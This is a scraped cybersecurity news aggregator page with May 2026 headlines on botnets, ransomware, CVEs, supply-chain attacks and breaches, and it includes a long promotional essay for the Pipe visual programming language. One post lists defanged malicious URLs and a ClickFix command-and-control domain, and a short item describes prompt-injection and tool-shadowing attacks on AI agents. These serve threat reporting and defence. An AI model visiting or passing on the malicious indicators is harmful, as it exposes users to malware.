Monday recap. Same mess, new week. A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times. Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually
Cybersecurity News and Vulnerability Aggregator
Cybersecurity news aggregator
Updated: 2:00 pm
J/K Navigate / Search S Save V Open Link
— or
treemd <(curl -sL https://allsec.sh/md) (as Markdown) Top Cybersecurity Stories Today
The Glassworm botnet targeting developers in software supply-chain attacks has been disrupted after researchers took down its resilient command-and-control infrastructure relying on Solana blockchain transactions and the BitTorrent DHT network. [...]
The FBI warned on Tuesday that the Silent Ransom Group (SRG) extortion gang is now targeting U.S.-based law firms in in-person data theft attacks. [...]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given U.S. federal agencies four days to secure their servers against a critical vulnerability in the LiteSpeed cPanel user-end plugin, which is actively being exploited in attacks. [...]
Hackers exploited a critical zero-day vulnerability in a server running the KnowledgeDeliver learning management system (LMS) to deploy the Godzilla web shell. [...]
Latest
Wednesday, May 27
A week after Dutch FIOD seized 800+ servers, the hosting network's ASN (AS209847) is still scanning at its normal daily rate
After FIOD seized 800+ servers and arrested two operators on May 18, the ELLIO research team reports that scanning from the network's ASN ranges has continued largely uninterrupted - and that while roughly a third of the recently-active ranges (including the legacy Stark blocks 94.131.105.0/24 and 92.118.232.0/24) have since been withdrawn from global routing, the surviving ranges under AS209847 (WorkTitans / THE.Hosting) are still announced and still scanning, at the network's normal daily rate. The sibling ASNs (AS213999 and the Moscow-based AS33993) remain routed and idle. The recent activity skews toward database and ICS/SCADA discovery = MongoDB, Redis, PostgreSQL, Oracle, LDAP, plus DNP3 and EtherNet/IP - alongside known-exploit probes like CVE-2017-17215 and WinRM.
The Glassworm botnet targeting developers in software supply-chain attacks has been disrupted after researchers took down its resilient command-and-control infrastructure relying on Solana blockchain transactions and the BitTorrent DHT network. [...]
GitHub - facebook/mcpguard-dynamic: Kernel-level eBPF sandbox for securing LLM agent tool calls made through the Model Context Protocol (MCP)
MCP currently lacks context isolation. This makes it highly susceptible to threat vectors like tool shadowing (registering malicious tools with identical names), data exfiltration, and dynamic tool modification post-deployment. Meta released a new open source project addressing a major attack surface in Agentic AI architectures, "indirect prompt injections" basically hiding malicious text in a tool description or a web page that the AI reads to trick the AI into stealing data or executing bad code. It does: * Input/Output Sanitization: Real-time monitoring of prompts, memory updates, and system tool calls. * Three-Tier Pipeline: Combines deterministic regex-based gatekeeping (blocking primitive string manipulations and file system path traversals) with semantic neural networks and LLM-driven arbitration for edge cases. * Performance: Handles the first layer of defense with sub-2ms processing delays to avoid choking agent workflows. Thought this would be of interest to anyone dealing with AppSec for LLM apps or defending autonomous agent infrastructure.
The FBI warned on Tuesday that the Silent Ransom Group (SRG) extortion gang is now targeting U.S.-based law firms in in-person data theft attacks. [...]
When an employee installs an AI writing assistant, connects a coding copilot to their IDE, or starts summarizing meetings with a new browser tool, they are doing exactly what a productive employee should do: finding faster ways to work. Across most organizations today, employees are running three to five AI tools on any given day. Most were never reviewed by IT. A significant portion connects
Threat Intel: Lithuania Investigates B2B Credential Misuse Exposing 600,000 National Registry Records
The Lithuanian Prosecutor General’s Office and the Criminal Police Bureau have initiated a joint investigation into a large-scale data exfiltration incident targeting the **State Enterprise Centre of Registers**. The incident involved the unauthorized copying of over 600,000 records from the country's national Real Estate and Legal Entities Registers. Rather than exploiting an unpatched software vulnerability, the attack mechanics rely on a classic trust-boundary compromise. **The Entry Vector: Cross-Agency Credential Misuse (MITRE T1078)** Forensic tracking indicates that the threat actors executed a series of unauthorized connections originating from foreign infrastructure. The entry vector relied on valid, high-privilege B2B institutional login credentials assigned to external state departments authorized to query the central registry database. Independent statements from legislative and defense officials suggest the specific access pathway was carved out by compromising authenticated accounts belonging to the **Department of Migration under the Ministry of the Interior**. By hijacking these valid inter-agency connection points, the threat actors bypassed perimeter barriers, allowing them to issue massive queries to the backend database without triggering immediate anomaly blocks. **Exfiltration Scope & Impact Profile** The breach was initially identified by internal monitoring in early April 2026, but public disclosure was delayed due to the ongoing criminal inquiry. The exfiltrated data schemas consist of: * Full legal names, dates of birth, and unique national identification numbers. * Registered physical addresses, corporate entity structures, and detailed cadastral/property registry extracts. The Centre of Registers has confirmed that primary consumer-facing vectors - such as telephone contact details, email addresses, bank account numbers, or raw cadastral measurement files - were not part of the exfiltrated datasets. The primary operational risk is tactical intelligence gathering. Security analysts have pointed out that bulk access to unlisted residential addresses linked to legal entities can be leveraged by foreign intelligence services for target profiling, spear-phishing orchestration, or coercion of state personnel, diplomats, and military figures. **Incident Response & Remediation** Following the identification of the unauthorized bulk queries, the Centre of Registers implemented the following controls: 1. Immediate revocation and blocking of all compromised inter-agency institutional accounts. 2. Mandatory credential rotation and strict query-volume throttling across all API and web self-service gateways linked to external state dependencies. 3. The director of the Centre of Registers, Adrijus Jusas, formally stepped down on May 25 following administrative scrutiny regarding legacy IT infrastructure and monitoring gaps. While independent defense officials note the incident matches the operational signatures of state-aligned hybrid surveillance operations, official attribution from the Prosecutor General's Office remains open.
Cybersecurity researchers have disclosed a security flaw in Gitea, an open-source, self-hosted platform for version control, that allows unauthenticated remote attackers to pull private container images from Gitea deployments without requiring an account, password, or other credentials. The vulnerability, tracked as CVE-2026-27771 (CVSS score: N/A), affects all versions of Gitea prior to 1.26.2
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given U.S. federal agencies four days to secure their servers against a critical vulnerability in the LiteSpeed cPanel user-end plugin, which is actively being exploited in attacks. [...]
The Dutch National Police arrested a 35-year-old man suspected of hacking the professional football club Ajax Amsterdam (AFC Ajax) earlier this year. [...]
Microsoft has released the KB5089573 preview cumulative update for Windows 11 versions 25H2 and 24H2, which comes with 30 changes, including performance and reliability improvements. [...]
Microsoft has warned of an active cryptojacking campaign that makes use of artificial intelligence (AI) chatbot interactions as a mechanism for surfacing malicious download sites. "This emerging delivery technique extends social engineering beyond conventional search results and increases the visibility of malicious software recommendations," Microsoft Defender Experts and the Microsoft
TL;DR: Visit https://sshlabs.compass-security.training to learn more about SSH security. Introduction SSH is a widely used protocol that provides secure access to remote systems. It enables encrypted communication, file transfers, command execution and shell access for system administration. However, when misconfigured, poorly secured or used in an unsafe way, SSH can become an attack vector for attackers. When we perform Linux hardening or infrastructure reviews , we often see that SSH is not used securel
Tuesday, May 26
Hackers exploited a critical zero-day vulnerability in a server running the KnowledgeDeliver learning management system (LMS) to deploy the Godzilla web shell. [...]
Some internet connectivity is returning in Iran after nearly 90 days offline, web monitoring groups say. But it isn’t clear if the reconnection is permanent.
The Iranian hacking group known as MuddyWater has been linked to a new campaign affecting at least nine organizations across nine countries on four continents in the first quarter of 2026. The activity targeted industrial and electronics manufacturing, education and public-sector bodies, financial services, and professional services, per the Threat Hunter Team from Symantec and Carbon Black.
Encrypted DNS in 2026: DoH, DoT, DoQ and DoH3 protocol comparison — including DNS hijacking attack vectors and what each protocol actually prevents
The security angle on encrypted DNS is often oversimplified. DoH prevents ISP-level snooping and basic DNS hijacking, but doesn't protect against a compromised resolver. DoT is easier to detect and block, which has real implications for threat actors trying to exfiltrate via DNS. DoQ is interesting from a security perspective because QUIC's connection ID migration makes traffic correlation harder. Article includes benchmark data and practical server config — but mostly written for the "which threat model does each protocol address" question.
I published a technical write-up on an old OLX account takeover issue. The core bug was an OTP correctness leak inside the rate-limit state. After repeated invalid OTP attempts, the application showed a lockout message. However, blocked submissions did not become response-equivalent. Invalid codes during lockout still produced the invalid-code signal. The valid code during lockout removed that signal while keeping the lockout message. That made the lockout state act as an oracle for whether the OTP was correct. The broader impact came from reuse of the verification flow across account paths, including recovery/reset-style flows, plus weak session revocation behavior after password change. The write-up focuses on the response-difference behavior, why the validity window mattered, how the issue escalated to account takeover, and why lockout states must stop leaking success/failure information.
There is no excerpt because this is a protected post. The post Protected: The State of AI Risk Management in 2026 appeared first on Heimdal Security Blog .
AI governance requires visibility into how AI tools interact with enterprise data. Varonis explains how its Atlas platform uses Claude Compliance API data to help monitor usage, investigate risk, and support compliance. [...]
SonicWall MFA bypasses are the kind of vulnerabilities that make defenders uncomfortable because they undermine one of the controls organizations trust most. When remote access infrastructure starts failing at the authentication layer, exposure scales very quickly.
Microsoft is testing a new Defender for Endpoint capability that will automatically isolate compromised endpoints to thwart attackers' attempts to move laterally across the network. [...]
Microsoft has rolled out updates to fix a remote code execution vulnerability impacting SharePoint that could be exploited by bad actors in attacks without requiring any specialized conditions to be met. The vulnerability, tracked as CVE-2026-45659, carries a CVSS score of 8.8. It has been assigned an important severity. "Deserialization of untrusted data in Microsoft Office SharePoint allows
Multi-factor authentication (MFA) was supposed to close a critical gap in identity security. It meant that, even if an attacker possessed the account credentials, they couldn't log in without the second factor. While that logic was sound, attackers have now figured out that they don't need to steal the second factor: they just need the user to hand it over. If your workforce authenticates with
As Americans stew over the looming risk of job-stealing AI and data centers in their back yards, the feds are raising the alarm about a new category of threat, documents obtained by WIRED show.
The Indian Computer Emergency Response Team (CERT-In) has issued new guidelines requiring organizations to patch critical security vulnerabilities in internet-exposed systems within 12 hours of being flagged where "feasible" to safeguard against potential threats stemming from threat actors' abuse of artificial intelligence (AI) tools and large language models (LLMs) to automate vulnerability
CISA has given U.S. government agencies until Wednesday evening to secure their servers against an SQL injection vulnerability in the Drupal content management system (CMS) that it flagged as actively exploited. [...]
Microsoft has confirmed a new known issue affecting Windows Server 2016 systems that causes domain controller lookups to fail after installing the KB5087537 May 2026 security update. [...]
The Iranian state-sponsored threat actor known as Nimbus Manticore (aka Screening Serpens and UNC1549) has been attributed to a fresh campaign using lures impersonating organizations in the aviation and software sectors across the U.S., Europe, and the Middle East following the joint U.S.-Israeli military campaign against the country in late February 2026. The activity, besides embracing
The ShinyHunters extortion gang stole the personal information of over 183,000 people after hacking the systems of convenience store chain giant 7-Eleven in April, according to data breach notification service Have I Been Pwned. [...]
Monday, May 25
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite Today, we welcome the 45th government onboarded to Have I Been Pwned’s free gov service: Bhutan. The Bhutan Computer Incident Response Team, BtCIRT, now has access to monitor Bhutanese government domains against the data in HIBP. As Bhutan’s national CIRT, BtCIRT is responsible for consuming threat intelligence and sharing relevant insights with its constituents, helping identify and respond to cyber risks affecting government services and the people who depend on them. This is exactly the sort of organisation the HIBP government service was built to support: national cybersecurity teams using breach data to identify leaked credentials and compromised databases associated with their government domains. BtCIRT now joins the growing list of national CIRTs and government cybersecurity teams using HIBP to better understand their exposure, respond quickly when new breaches appear, and reduce the risk posed by compromised credentials before attackers can take advantage.
# The Problem AI can now analyze code so well that it can spot software vulnerabilities in just seconds. If you want a vivid explanation, Theo (t3.gg) breaks it down [here](https://www.youtube.com/watch?v=M_HxHr7du5M). To make it simple: for decades, three assumptions kept software more secure – and now none of them hold up. Here’s the first assumption: finding exploits took highly paid experts. That’s what kept attackers limited. AI erased that overnight. Now, anyone with enough computing power and a model can zero in on vulnerabilities in real software in minutes. Second: the 90-day window for coordinated disclosure was supposed to be enough time. If you spotted a bug, maintainers had 90 days to patch and roll it out before everyone found out. That relied on assumption one. Without it, the window vanishes – two independent researchers found a huge Linux kernel exploit within nine hours of each other. Third: going from patch to a working exploit was hard. Maintainers used to merge fixes quietly, with bland commit messages, hoping to buy time before attackers figured it out. AI ended that, too. Feed a four-line code diff into an AI model, ask if it looks like a security patch, and two out of three major models nail it right away – without reading the commit message. Now, the pipeline from patch to exploit is automatable. So now, every piece of software, especially open-source, is exposed to zero-days at a speed and scale no one’s seen before. And as AI keeps improving, it only gets worse. Vulnerabilities are found faster and faster, but patching sticks to its old pace. That gap? It grows every month. # Why Conventional Responses Are Not Enough **Patching Faster** The obvious answer is patching faster. If AI finds bugs quicker, use it to patch them faster, too. Sure, you shave off some risk around the edges, but it changes nothing fundamental. The attack surface never shrinks. AI scanners just jump to the next bug. Patching faster is like sprinting on a treadmill – you’re not getting off it. **Getting Rid of Open-Source** More drastic: kill open-source. If the source isn’t public, AI can’t analyze it directly. For a brief moment, that might slow things down. But it won’t stop AI for long. Without source code, AI can reverse-engineer binaries. Obfuscation slows that, but now we’re locked in a never-ending battle of AI obfuscation versus AI deobfuscation. There’s no clear winner here. If your software runs strictly on the backend and never gets distributed, attackers just probe the backend via its public interfaces with crafted requests. AI is fantastic at that, too. Honestly, we all love open-source. It’s one of the most powerful drivers software’s ever had. Closing it would be a huge loss with minimal security advantage. The answer here is no. # The Root Cause: Too Much to Attack Both patching faster and hiding source code try to win the same race with AI. Neither deals with why this race is so brutal. The real issue is the attack surface size. A typical production app pulls in hundreds of third-party libraries. Each of those pulls in more. The code available for AI to scan is a hundred times bigger than what the developer actually wrote. Most of it has never been read or audited by anyone on the team. It’s all public, constantly scanned, and grows with every install. Attackers now target code developers trusted, not just code developers wrote themselves. Look at supply chain attacks: the 84 Tanstack packages compromised, CopyFail exploits in Python libraries, CI pipeline attacks – they all exploited dependencies, not application logic. If you can’t win by running faster, shrink what you’re racing to protect. # Making Software Easier to Patch: The Visual Programming Direction One practical way forward is to make patching easier by breaking apps into small, independently replaceable parts. The finer the granularity, the better – smaller components mean you can replace or isolate just the affected piece without shutting down or rewriting large chunks of the application. A vulnerability in one small component should stay contained, not cascade through the system. Plugin architectures take this approach. Smaller parts mean smaller attack surfaces, and you can patch just the component instead of the whole system. But plugins still rely on third-party libraries, so attack surfaces don't really shrink. Plugin systems also pile on their own headaches: more to manage, compatibility issues between versions, more complexity as the number of plugins grows. Many of these problems come down to tight coupling – plugins are still deeply wired into the host application, making them harder to replace cleanly than they appear. Microservices were designed specifically to address this. By moving to a loosely-coupled architecture where each service communicates through explicit, well-defined interfaces, you get true independence – one service can be replaced, redeployed, or taken offline without touching the others. A vulnerability in one service stays isolated. But for most projects, the overhead becomes the real problem. Dozens of services means dozens of APIs to version, monitor, secure, and keep compatible. The infrastructure cost – service discovery, load balancing, distributed tracing, inter-service authentication – can dwarf the original application. This is why many small and mid-size teams are moving away from microservices toward modular monoliths. The cure became more expensive than the disease. The pattern is consistent across all these approaches: the finer the granularity, the better the control, but the higher the cost – more infrastructure, more interfaces to maintain, and a mental model of how everything connects that gets increasingly hard to hold in your head. No text-based architectural approach has resolved this tension. It only moves it around. Visual programming languages (VPLs) break this pattern. They offer maximum granularity – every block is its own independently replaceable component – while solving or mitigating the overhead problems that plague text code solutions. This is what makes VPLs fundamentally better than any text-based architectural approach: the same granularity, with none or minimum of the downsides. In a VPL, each block on a diagram acts as a standalone, replaceable component. Unlike text-based components, VPLs give full transparency: the logic is right there on the diagram. Any developer can look at it and quickly understand what the program does without digging through code. Swapping a block doesn't require recompilation – it just needs to fit with the blocks it connects to. Patching becomes as easy as drag-and-drop. These blocks are simple to replace and isolate. If one's compromised, you can disconnect or disable it immediately and interactively without recompiling, minimizing collateral damage while preparing a fix. Transparency matters for security beyond just patching. With text, the logic connecting components is more hidden – you have to read code to understand it. In a visual program, it's laid out in the diagram. No room for hidden connections. **Composable Blocks and the Visual Hierarchy** A well-designed VPL goes further than a flat diagram of blocks. Blocks are composable: any block can contain other blocks inside it, forming a hierarchy of arbitrary depth. High-level business logic sits at the top. Each block can be opened to reveal its internal workflow. The hierarchy goes all the way down to the bottom level, where blocks contain no further sub-blocks. These are called leaf blocks, and they are the only place in the hierarchy where code lives. This composability is what makes a VPL suitable for large, complex applications rather than toy examples. The top-level diagram stays clean and readable. Complexity is encapsulated inside blocks. Any level of the hierarchy is independently replaceable without touching the rest. There is another advantage that is easy to miss: increasing granularity in a VPL is trivial. In a text-based plugin or microservice architecture, splitting a component into finer pieces means rewriting code, updating interfaces, and often changing infrastructure – service registries, load balancers, deployment configurations. It is expensive enough that teams often avoid it even when they know finer granularity would be better. In a VPL, splitting a block into smaller sub-blocks is a visual operation. You open the block, draw the internal workflow, and connect the pieces. No infrastructure changes, no interface rewrites, no ripple effects through the rest of the system. The cost of increasing granularity drops to near zero, which means teams can afford to do it whenever it makes sense rather than only when the pain of not doing it becomes unbearable. This is the compounding advantage of VPLs over all text-based architectural approaches: not just that maximum granularity is available, but that reaching and adjusting that granularity is effortless compared to anything else available today. # The VPL Security Model: Shrinking the Attack Surface **Third-Party Libraries as Visual Workflows** People usually think a visual app replaces all its outside libraries with AI-generated code. That’s not realistic. Libraries pack in too much functionality to recreate from scratch. The realistic scenario: third-party libraries become visual workflows themselves. In a VPL ecosystem, a library is a visual workflow with a bit of code at the leaves for OS interaction. Applications mix these library visuals with their own. This changes everything for security. If you find a bug in a library, you can dive in and fix it right in its workflow, since you see everything. Or you can wait for a patched version and drop in the new block. No need for recompiling or risking breakage elsewhere. Either way, it’s faster, more transparent, and less risky than patching opaque text-based libraries – where changing one thing might break another. **The Leaf Code Layer: Where Vulnerability Lives** At the bottom of visual hierarchies sit the leaf blocks, the only place for code. These handle things like OS calls, file reads, network connections – the low-level stuff. Leaf code can invoke text libraries. But you want to make dependencies here as thin as possible. The simpler the leaf code, the smaller the attack surface. The first level of minimizing attack surface is AI code generation. If the dependency is small or simple, have AI build it directly instead of pulling in a library. That wipes out the dependency altogether – the new code isn’t public, so nothing for AI scanners to target. The second level, as AI capabilities grow, is direct visual workflow generation. Rather than generating text code, AI will be able to generate complete visual workflows with a thin leaf code layer. This makes dependency self-production an even more attractive option: the generated component is not just functional but transparent, composable, and fully auditable as a visual workflow. If you have to use third-party stuff, prefer VPL-based libraries. You get transparency and easy patching. Their attack surface beats opaque text libraries any day. When all these practices are applied together, the application approaches the ideal state: no or minimum third-party library dependencies and maximum use of VPL-based libraries, with the attack surface reduced to the operating system or close to it. # Why Pipe Is the Right VPL **The Gap No Existing VPL Has Closed** Visual languages aren’t new – LabVIEW owns engineering, Simulink rules in aerospace, Node-RED is all over IoT, Unreal Blueprints for games. None of them fit the broad security needs outlined here. They're either built for niche domains, or just can't handle production-level complexity. To truly shrink attack surfaces in production apps, a VPL has to be general-purpose enough to cover any domain, and robust enough for real-world code. [Pipe](https://pipelang.com/) (pipelang.com) is built exactly for that. It’s general-purpose and sophisticated enough to handle production-level applications anywhere. Seven years went into its architecture, ten provisional USPTO patents cover its design, and you can check out the full language spec at [pipelang.com](https://pipelang.com/). **How Pipe Implements Block Interfaces: Domains and Overlaps** In Pipe, each block input is analogous to an independent API endpoint. The interface of that endpoint is defined by a domain: a hierarchical data structure, a tree where each node can have both a value and children, similar to JSON but more expressive. Domains are assigned to block inputs and outputs. When two blocks hook up with different domains, Pipe resolves this with "overlaps": it lines up domain nodes with matching tree paths between the output and the input domains, passing data only between nodes where paths match. Unmatched nodes take explicitly defined or implicitly assumed default values. That means almost any two Pipe blocks connect easily, even if their interfaces don't match up cleanly – with some exceptions such as data type compatibility between source and destination domain nodes. The domain overlap gives you flexible connections, making Pipe practical at scale. And Pipe guarantees interface contracts, so developers don't have to write validation at block boundaries. This makes Pipe's block interfaces more loosely coupled than even conventional API interfaces. A standard API requires both sides to agree on an exact contract – matching field names, types, and structure. Any mismatch means the developer must write adapter code, update the contract, or handle errors explicitly. Pipe's domain overlap mechanism removes that requirement entirely. Blocks connect regardless of interface differences, with the language resolving mismatches automatically through defaults. Pipe rejects connectivity only when data types are incompatible or when domain nodes are marked as mandatory in overlap but missing. This is architecture at its loosest possible coupling: not just loosely coupled, but self-adapting, where the system resolves differences rather than the developer. **Addressing the Drawing Effort Concern** Some folks say visual diagrams take more effort to draw than typing a plain code. Here’s why that’s not a problem. Pipe diagrams are naturally more compact. A block needing lots of input parameters doesn’t need separate lines for each – one domain connection carries everything. Seven parameters, one connection. Diagrams stay neat, even as logic grows. Plus, Pipe lets you modify workflows with AI. Want to add blocks, reroute, restructure? Just describe it in natural language and Pipe does the work. Diagram maintenance gets as easy as telling the system what you want, not fussing with box placement. # The Security Spectrum Not every app can jump straight to Pipe with slim leaf code, but every step toward it is a serious security boost. * **Step 1. Open-source text code and libraries:** entire source and dependencies open to AI scanning. Biggest possible attack surface. * **Step 2. Closed-source text code with libraries:** source hidden, but binaries are reverse-engineerable, APIs exposed. Libraries still wide open. * **Step 3. Pipe with some text libraries:** dramatically shrinks the attack surface, but remaining text libraries still risky. * **Step 4. Pipe with visual library workflows and thin leaf code:** almost no third-party library dependencies, only VPL-based ones. Attack surface drops down to mostly just the OS. That last step is the end goal. You don’t need to get there instantly or completely – even moving partway over is already a big improvement from old-school architectures. # Conclusion AI made finding vulnerabilities cheap, fast, and possible for just about anyone. Patching faster helps a bit, but doesn’t address the real structural flaw. Killing open-source is a massive loss for little actual gain. The right answer? Reduce the attack surface. Pipe, with libraries represented visually and leaf code kept thin for OS calls, gets you there. Everything is transparent and auditable at every level. You can isolate parts instantly. Patching is safer and faster. Supply chain risk from libraries is nearly gone. Remaining vulnerabilities shift to the OS – which the vendor maintains. As AI generates more code faster, the need for VPLs such as Pipe will grow. The goal isn’t making software bulletproof, but making it fundamentally harder to exploit. When your only attack surface left is the operating system, you’ve actually achieved that.
Anthropic appears to be preparing for the public rollout of the Mythos model, which was announced in April as a restricted model that poses major security risks to private and public software. [...]
Ciaran Martin says Reform UK leader’s allegation over Guardian report on £5m gift ‘entirely unsubstantiated’ Nigel Farage’s claim that a Russian hack was behind a Guardian report on the £5m gift he received from a crypto billionaire has been described as “without any merit” by a former head of the National Cyber Security Centre. Ciaran Martin, founding chief executive of the agency, which is part of GCHQ, said Farage’s allegation, if true, would have major implications for UK policy towards Russia but that the Reform UK leader had yet to provide “a shred of evidence”. Continue reading...
Monday recap. Same mess, new week. A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times. Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually
Authorities in the Netherlands have arrested the co-owners of two related Internet hosting companies for operating IT infrastructure used by Russia to carry out cyberattacks, influence operations and disinformation campaigns inside the European Union. The two men were the focus of a 2025 KrebsOnSecurity story about how their hosting companies had assumed control over the technical infrastructure of Stark Industries Solutions , an Internet service provider sanctioned last year by the EU as a frequent staging ground for cyber mischief from Russia’s intelligence agencies. An investigator with the Tax Intelligence and Investigation Service (FIOD), the Dutch financial crimes agency, during the raid. Image: FIOD. The Dutch daily news outlet de Volkskrant reports that the Dutch financial crime agency FIOD on May 18 arrested a 57-year-old from Amsterdam and a 39-year-old from The Hague, charging them with violating sanctions law by directly or indirectly making economic resources available to EU-sanctioned ent
The FBI is warning about the Kali365 phishing-as-a-service platform (PhaaS) that is used to hijack Microsoft 365 accounts by abusing OAuth device code authentication to steal session tokens and bypass multi-factor authentication (MFA). [...]
Threat actors are exploiting a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript code with an aim to fuel ClickFix attacks. According to QiAnXin XLab, the activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost's Content API that could allow an unauthenticated attacker to read arbitrary data from the
Ask a cybersecurity pro about Network Detection and Response (NDR) and you might still hear "Noisy," "Too much data." But ask the teams running NDR that includes agentic AI capabilities and you'll hear they're actually using it to catch threats earlier, triage faster, and chase fewer false positives. The old complaint lingers in part because reputations are sticky, and because NDR has evolved
As attackers ramp up their AI exploit development, the search for software vulnerabilities is changing rapidly.
Cybersecurity researchers have shed light on a cross-platform malware called RemotePE that has been put to use by the North Korea-linked Lazarus Group in attacks targeting financial and cryptocurrency organizations. RemotePE, per NCC Group subsidiary Fox-IT, is part of a multi-stage attack chain that involves two loaders tracked as DPAPILoader and RemotePELoader. "DPAPILoader decrypts and
To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.
Sunday, May 24
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite Well, that didn't last long! Recording this on Saturday morning my time, I observed ShinyHunters having gone quiet since the massive haul that would have been the Instructure ransom. It was two weeks almost to the hour since I'd first heard rumour of payment being made, and I posited that groups like this often go quiet after they feel the heat, only to emerge shortly after, the drug that is hacking being too strong to ignore. Anyway, here we now are: ShinyHunters Claims 3 New Victims https://t.co/v8Wf457Gbp : U.S.-based dental benefits administrator and oral health company. Charter Communications, Inc.: U.S. telecommunications and cable company best known for Spectrum internet, TV, mobile, and phone services. … pic.twitter.com/epWcVVGRHa — Dark Web Informer (@DarkWebInformer) May 22, 2026 DentaQuest has since been removed, but their website is currently returning "Access Denied", which isn't a great look. Obviously, the broken website doesn&apos
Saturday, May 23
Plus: Google publishes a live exploit for an unpatched flaw, the feds arrest two men accused of creating thousands of nonconsensual deepfake nudes, and more.
Cybersecurity researchers have flagged a fresh software supply chain attack campaign that has targeted multiple PHP packages belonging to Laravel-Lang to deliver a comprehensive credential-stealing framework. The affected packages include - laravel-lang/lang laravel-lang/http-statuses laravel-lang/attributes laravel-lang/actions "The timing and pattern of the newly published tags
Friday, May 22
Just added an interactive security map to my project NoEyes showing exactly what the server sees (and doesn't)
repo : [https://github.com/Ymsniper/NoEyes](https://github.com/Ymsniper/NoEyes)
Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials. On May 18, KrebsOnSecurity reported that a CISA contractor with administrative access to the agency’s code development platform had created a public GitHub profile called “ Private-CISA ” that included plaintext credentials to dozens of internal CISA systems. Experts who reviewed the exposed secrets said the commit logs for the code repository showed the CISA contractor disabled GitHub’s built-in protection against publishing sensitive credentials in public repos. CISA acknowledged the leak but has not responded to questions about the duration of the data exposure. However, experts who reviewed the now-defunct Private-CISA archive said it was originally created in November 2025, and that it exhibits a pattern consistent with an individual operator using the repository as a working scratchpad o
Harvard and \~140 other compromised legitimate sites are now spreading ClickFix malware. hxxps://hir.harvard.edu/israel-and-international-football-a-breaking-point/ hxxps://hir.harvard.edu/a-better-way-forward-an-interview-with-paul-ryan/ Both contain a remote load script in it's HTML that reverses it's C2 `sj.ssc/ipa/orp.eralfduolccitats` to original form and then displays the ClickFix box from it. C2: hxxps://staticcloudflare.pro AnyRun identifies the loading pattern well: * [https://app.any.run/tasks/2ac73567-8bdf-41b0-999e-08057deb3dd3](https://app.any.run/tasks/2ac73567-8bdf-41b0-999e-08057deb3dd3) * [https://app.any.run/tasks/8362c5f5-11ab-4b34-b7a5-8e2fb2d6355c](https://app.any.run/tasks/8362c5f5-11ab-4b34-b7a5-8e2fb2d6355c) Sandbox detonation of one of the ClickFix payloads: [https://app.any.run/tasks/bf4b5c8d-f76d-4398-b465-9a1d8ec899bb](https://app.any.run/tasks/bf4b5c8d-f76d-4398-b465-9a1d8ec899bb) Original post and more discovered compromised URL's: [https://x.com/rifteyy/status/2057842147630411877](https://x.com/rifteyy/status/2057842147630411877)
In March 2026, attackers exploited a pull_request_target misconfiguration in the aquasecurity/trivy-action GitHub Action to exfiltrate organization and repository secrets, then used those credentials to backdoor LiteLLM on PyPI (see Trivy’s post-mortem for the full timeline). zizmor is a static analyzer that GitHub Actions users run to catch exactly these misconfigurations before they ship. When GitHub Actions added support for YAML anchors in September 2025, a small but high-value slice of the ecosystem started writing workflows that zizmor could only analyze on a best-effort basis. Over the past three months, Trail of Bits collaborated with the zizmor maintainers to bring zizmor ’s anchor support up to full coverage. First, we fixed parsing bugs that caused crashes, produced wrong-location findings, and silently mishandled aliased values. Second, we surfaced deserialization edge cases that broke zizmor on otherwise valid workflows. Finally, we helped align zizmor ’s expression evaluator with GitHub’s own Known Answer Tests . We validated all of this against a new corpus of 41,253 workflows from 6,612 high-value open-source repositories. The result: 20 filed issues, 15 merged pull requests. Building the test corpus To u
GreyNoise compared 119,842 malicious IPs against 11 major threat feeds. The average coverage: just 2%, exposing the limits of static blocklists.
Thursday, May 21
Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf , a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States. A criminal complaint unsealed today in an Alaska district court charges Jacob Butler , a.k.a. “ Dort ,” of Ottawa, Canada with operating the Kimwolf DDoS botnet. A statement from the Department of Justice says the complaint against Butler was unsealed following the defendant’s arrest in Canada by the Ontario Provincial Police pursuant to a U.S. extradition warrant. Butler is currently in Canadian custody awaiting an initial court hearing scheduled for early next week. The government said Kimwolf targeted infected devices which were traditionally “firewalled” from the rest of the internet, such as digital photo frames and web cameras. The infected systems were then rented to other cybercriminals, or forced to participate in record-smashing DDoS attacks, as well as assaults that affected Internet address ranges for the Department of Defense . Consequently, the DoD’s Defense Criminal Investigative Service is investigating the case, with assistance from the FBI field office in Anchorage. “KimWolf was tied to DDoS attacks which were measured at nearly 30 Terabits per second, a record in recorded DDoS attack volume,R
Three firms will pay nearly $1 million for selling “Active Listening” technology that they claimed tapped people’s phones for advertising. The FTC alleges the “tech” was just pricey email lists.
How TeamPCP's Python Toolkit Survives a C2 Takedown: FIRESCALE, GitHub, and the Victim's Own Account
